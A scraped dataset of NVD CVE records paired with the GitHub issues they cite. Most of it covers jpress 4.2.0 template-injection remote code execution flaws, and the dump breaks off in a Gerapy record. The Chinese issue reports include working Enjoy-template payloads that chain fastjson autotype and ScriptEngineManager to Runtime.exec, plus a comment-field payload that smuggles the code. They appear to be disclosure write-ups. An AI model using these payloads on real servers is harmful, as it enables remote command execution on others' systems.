"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/bromite/bromite/issues/2#issuecomment-524102774"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/bromite/bromite/issues/2#issuecomment-524102774"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bromite:bromite:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9364A5D1-99E3-4529-9B05-5B4A8B832070",
"versionEndExcluding": null,
"versionEndIncluding": "78.0.3904.130",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"203"
] | 203 | https://github.com/bromite/bromite/issues/2#issuecomment-524102774 | [
"Third Party Advisory"
] | github.com | [
"bromite",
"bromite"
] | This issue composes of multiple parts:
* ~~a new tab/UI to manage the adblocking feature~~ will not implement this
* logic to download the adblock filters and store them
* logic to parse the adblock filters (or an intermediate format)
* users can of course customize where the adblock filters come from (URLs)
The projects we could look at are adBlock and uBlock origin and other browsers that implement such functionality. | Support user-specified adblock filters | https://api.github.com/repos/bromite/bromite/issues/2/comments | 39 | 2017-10-11T14:19:01Z | 2024-01-11T18:34:59Z | https://github.com/bromite/bromite/issues/2 | 264,605,079 | 2 | 3,109 |
CVE-2021-46117 | 2022-01-26T16:15:07.613 | jpress 4.2.0 is vulnerable to remote code execution via io.jpress.module.page.PageNotifyKit#doSendEmail. The admin panel provides a function through which attackers can edit the email templates and inject some malicious code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://jpress.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/171"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://jpress.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/171"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/JPressProjects/jpress/issues/171 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"JPressProjects",
"jpress"
] | # 审计过程
**与之前一篇不同,之前交过一个邮件模板注入的洞,之前那个触发点是在article的评论处,这次是在page的评论处,代码很相似,但不是同一份代码**
jpress后台提供了**评论邮件通知管理员**功能,而且发送的邮件模板可控,官方给出了例子,告诉我们可以用`#(comment.id)`,那么猜测这里可能会存在模板渲染问题

接着,尝试发一条评论看看后端代码的执行流程,后端对应的代码是`io.jpress.module.page.controller.PageController#postComment`,这个方法的作用主要是将评论信息保存到数据库,同时还会发送短信通知网站管理员

跟进`io.jpress.module.page.PageNotifyKit#notify`,发现这里定义了两种方式,一个是sms发送,一个是email,我们跟进email的

发现`byEmail`方法会继续调用`doSendEmail`,这个函数里面有模板渲染操作,在第90和91行,分别对邮件的emailTitle和emailTemplate调用`getTemplateByString`进行渲染,这两个变量实际上就是最开始我们在前端页面输入的

分析到这里,结合之前交过的那个article页面的邮件模板rce,应该可以直接打模板注入了
# 效果演示
首先通过弱密码进入后台

然后开启这两项

然后配置管理员邮箱,随便配一个,这个是收件者

还得配置发送者的邮箱,**配置完记得点提交,拉到最下面点提交**

然后设置恶意邮件模板,**同样记得要提交**
```
#set(str=comment.content)
#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance())
#(x.setAutoTypeSupport(true))
#set(sem=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#(x.addAccept(sem))
#set(json=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#set(x=com.alibaba.fastjson.JSON::parse(json))
#set(js=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#set(e=x.getEngineByName(js))
#(e.eval(str))
```

接下来,我们需要更换一个页面模板,因为默认的模板是不提供page的模板的,启用这个模板

然后创建一个page,点击发布

访问一下我们创建的page

接下来,在page页面评论如下内容
```
javax.script.ScriptEngineManager|{"@type":"javax.script.ScriptEngineManager"}|js|java.lang.Runtime.getRuntime().exec("calc")
```
发现计算器成功弹出,漏洞验证成功
 | jpress后台存在命令执行漏洞-邮件模板page | https://api.github.com/repos/JPressProjects/jpress/issues/171/comments | 1 | 2022-01-09T08:53:50Z | 2022-08-07T09:53:07Z | https://github.com/JPressProjects/jpress/issues/171 | 1,097,141,191 | 171 | 3,110 |
CVE-2021-46115 | 2022-01-26T17:15:07.730 | jpress 4.2.0 is vulnerable to RCE via io.jpress.web.admin._TemplateController#doUploadFile. The admin panel provides a function through which attackers can upload templates and inject some malicious code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://jpress.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/169"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://jpress.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/169"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/JPressProjects/jpress/issues/169 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"JPressProjects",
"jpress"
] | # 审计过程
jpress后台存在模板上传功能,不过存在些许过滤,我们使用fastjson来辅助获取`ScriptEngineManager`,然后执行任意js代码,就可以实现rce,payload如下
```
#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance())
#(x.setAutoTypeSupport(true)) #(x.addAccept("javax.script.ScriptEngineManager"))
#set(x=com.alibaba.fastjson.JSON::parse('{"@type":"javax.script.ScriptEngineManager"}'))
#set(e=x.getEngineByName("js"))
#(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))
```
# 效果演示
弱密码进入后台,修改上传[evil.html](http://121.5.40.245:8081/jpress/upload_template/evil.html)

访问http://localhost/evil,可以看到计算器弹出,漏洞验证成功

| jpress后台存在命令执行漏洞-模板上传 | https://api.github.com/repos/JPressProjects/jpress/issues/169/comments | 1 | 2022-01-09T08:49:15Z | 2022-08-07T09:52:23Z | https://github.com/JPressProjects/jpress/issues/169 | 1,097,140,367 | 169 | 3,111 |
CVE-2021-46116 | 2022-01-26T17:15:07.780 | jpress 4.2.0 is vulnerable to remote code execution via io.jpress.web.admin._TemplateController#doInstall. The admin panel provides a function through which attackers can install templates and inject some malicious code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://jpress.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/168"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://jpress.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/168"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/JPressProjects/jpress/issues/168 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"JPressProjects",
"jpress"
] | # 审计过程
jpress后台存在模板安装功能,攻击者可以安装恶意模板造成rce。
在页面上点击安装模板

上传恶意模板之后,程序运行到`io.jpress.web.admin._TemplateController#doInstall`,这个函数的作用是将上传的zip文件解压,然后存到classes/webapp/templates目录下,这个目录是专门用来存储模板文件的

来看具体代码,`io.jpress.web.admin._TemplateController#doInstall`方法前面主要是一系列检查,检查是不是zip,文件是否已经存在等,最后来到156行,解压zip,然后这个方法就基本结束了。

然后就可以看到,我们写的恶意模板已经被解压到了这个目录下

不过模板注入存在些许过滤,我们使用fastjson来辅助获取`ScriptEngineManager`,然后执行任意js代码,就可以实现rce,payload如下
```
#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance())
#(x.setAutoTypeSupport(true)) #(x.addAccept("javax.script.ScriptEngineManager"))
#set(x=com.alibaba.fastjson.JSON::parse('{"@type":"javax.script.ScriptEngineManager"}'))
#set(e=x.getEngineByName("js"))
#(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))
```
接下来怎么进行利用呢?看到后台这个地方存在一个模板预览功能

开启之后可以通过get传入template参数来指定使用的模板,比如这里我们指定使用`cn.jeanstudio.bonhumeur`这个模板

那么,接下来就很简单了,我们只需要指定使用我们刚刚上传的恶意模板就行了

# 效果演示
弱密码进入后台,安装恶意模板[evil.zip](http://121.5.40.245:8081/jpress/install_template/evil.zip)

开启模板预览功能

访问http://localhost/evil?template=evil,发现计算器弹出,漏洞验证成功

| jpress后台存在命令执行漏洞-模板安装 | https://api.github.com/repos/JPressProjects/jpress/issues/168/comments | 1 | 2022-01-09T08:44:35Z | 2022-08-07T09:54:17Z | https://github.com/JPressProjects/jpress/issues/168 | 1,097,139,500 | 168 | 3,112 |
CVE-2021-46118 | 2022-01-26T17:15:07.820 | jpress 4.2.0 is vulnerable to remote code execution via io.jpress.module.article.kit.ArticleNotifyKit#doSendEmail. The admin panel provides a function through which attackers can edit the email templates and inject some malicious code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://jpress.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/170"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://jpress.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/170"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/JPressProjects/jpress/issues/170 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"JPressProjects",
"jpress"
] | # 审计过程
jpress后台提供了**评论邮件通知管理员**功能,而且发送的邮件模板可控,官方给出了例子,告诉我们可以用`#(comment.id)`,那么猜测这里可能会存在模板渲染问题

接着,尝试发一条评论看看后端代码的执行流程

后端对应的代码是`io.jpress.module.article.controller.front.ArticleController#postComment`,这个方法的作用主要是将评论信息保存到数据库,同时还会发送短信通知网站管理员

跟进`io.jpress.module.article.kit.ArticleNotifyKit#notify`,发现这里定义了两种方式,一个是sms发送,一个是email,我们跟进email的
发现`byEmail`方法会继续调用`doSendEmail`,这个函数里面有模板渲染操作,在第90和91行,分别对邮件的emailTitle和emailTemplate调用`getTemplateByString`进行渲染,这两个变量实际上就是最开始我们在前端页面输入的

分析到这里应该可以直接打模板注入了,构造如下payload
```
#set(x=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager"))
#set(e=x.getEngineByName("js"))
#(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))
```

然后随便发一条评论,这时会触发邮件发送,就会触发ssti。但是很遗憾,评论之后发现触发失败了,后端出现了报错

排查问题后发现,我们的payload被后端处理过,**payload中的引号被html编码了**,那么在模板解析的时候自然就报错了。
因此尝试不使用引号构造payload,构造出了如下payload,我们将字符串内容通过评论内容进行传入
```
#set(str=comment.content)
#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance())
#(x.setAutoTypeSupport(true))
#set(sem=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#(x.addAccept(sem))
#set(json=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#set(x=com.alibaba.fastjson.JSON::parse(json))
#set(js=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#set(e=x.getEngineByName(js))
#(e.eval(str))
```
因为后端在渲染模板时将comment对象传入了,所以我们可以获取comment.content,而这个值又是在评论时我们可以控制的,最终就造成了rce

# 效果演示
首先通过弱密码进入后台

然后开启这两项

然后配置管理员邮箱,随便配一个,这个是收件者

还得配置发送者的邮箱,**配置完记得点提交,拉到最下面点提交**

然后设置恶意邮件模板,**同样记得要提交**
```
#set(str=comment.content)
#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance())
#(x.setAutoTypeSupport(true))
#set(sem=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#(x.addAccept(sem))
#set(json=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#set(x=com.alibaba.fastjson.JSON::parse(json))
#set(js=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#set(e=x.getEngineByName(js))
#(e.eval(str))
```

接下来,随便找一篇博客在下面评论这个payload
```
javax.script.ScriptEngineManager|{"@type":"javax.script.ScriptEngineManager"}|js|java.lang.Runtime.getRuntime().exec("calc")
```
发现计算器成功弹出,漏洞验证成功
 | jpress后台存在命令执行漏洞-邮件模板article | https://api.github.com/repos/JPressProjects/jpress/issues/170/comments | 1 | 2022-01-09T08:52:56Z | 2022-08-07T09:53:35Z | https://github.com/JPressProjects/jpress/issues/170 | 1,097,141,030 | 170 | 3,113 |
CVE-2021-46114 | 2022-01-26T19:15:08.290 | jpress v 4.2.0 is vulnerable to RCE via io.jpress.module.product.ProductNotifyKit#doSendEmail. The admin panel provides a function through which attackers can edit the email templates and inject some malicious code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://jpress.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/172"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://jpress.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JPressProjects/jpress/issues/172"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/JPressProjects/jpress/issues/172 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"JPressProjects",
"jpress"
] | # 审计过程
**与之前两篇不同,之前交过两个邮件模板注入的洞,一个触发点是在article的评论处,一个是在page的评论处,这次是在product的评论处,代码很相似,但不是同一份代码**
jpress后台提供了**评论邮件通知管理员**功能,而且发送的邮件模板可控,官方给出了例子,告诉我们可以用`#(comment.id)`,那么猜测这里可能会存在模板渲染问题

接着,尝试发一条评论看看后端代码的执行流程,后端对应的代码是`io.jpress.module.product.controller.front.ProductController#postComment`,这个方法的作用主要是将评论信息保存到数据库,同时还会发送短信通知网站管理员

跟进`io.jpress.module.product.ProductNotifyKit#doNotifyAdministrator`,发现这里定义了两种方式,一个是sms发送,一个是email,我们跟进email的

发现`doNotifyAdministratorByEmail`方法会继续调用`doSendEmail`,这个函数里面有模板渲染操作,在第90和91行,分别对邮件的emailTitle和emailTemplate调用`getTemplateByString`进行渲染,这两个变量实际上就是最开始我们在前端页面输入的

分析到这里,结合之前交过的那个邮件模板rce,应该可以直接打模板注入了
# 效果演示
首先通过弱密码进入后台

然后开启这两项

然后配置管理员邮箱,随便配一个,这个是收件者

还得配置发送者的邮箱,**配置完记得点提交,拉到最下面点提交**

然后设置恶意邮件模板,**同样记得要提交**
```
#set(str=comment.content)
#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance())
#(x.setAutoTypeSupport(true))
#set(sem=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#(x.addAccept(sem))
#set(json=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#set(x=com.alibaba.fastjson.JSON::parse(json))
#set(js=str.substring(0, str.indexOf(124)))
#set(str=str.substring(str.indexOf(124)+1))
#set(e=x.getEngineByName(js))
#(e.eval(str))
```

然后创建一个product,点击上架

访问一下刚刚的商品

接下来,在商品下面评论如下内容
```
javax.script.ScriptEngineManager|{"@type":"javax.script.ScriptEngineManager"}|js|java.lang.Runtime.getRuntime().exec("calc")
```

发现计算器成功弹出,漏洞验证成功
 | jpress后台存在命令执行漏洞-邮件模板product | https://api.github.com/repos/JPressProjects/jpress/issues/172/comments | 1 | 2022-01-09T08:54:40Z | 2022-08-07T09:52:47Z | https://github.com/JPressProjects/jpress/issues/172 | 1,097,141,322 | 172 | 3,114 |
CVE-2021-32849 | 2022-01-26T22:15:07.903 | Gerapy is a distributed crawler management framework. Prior to version 0.9.9, an authenticated user could execute arbitrary commands. This issue is fixed in version 0.9.9. There are no known workarounds. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/issues/197"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/issues/217"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/security/advisories/GHSA-756h-r2c9-qp5j"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://lgtm.com/projects/g/Gerapy/Gerapy?mode=tree&ruleFocus=1505994646253"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2021-076-gerapy/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/issues/197"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Gerapy/Gerapy/issues/217"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
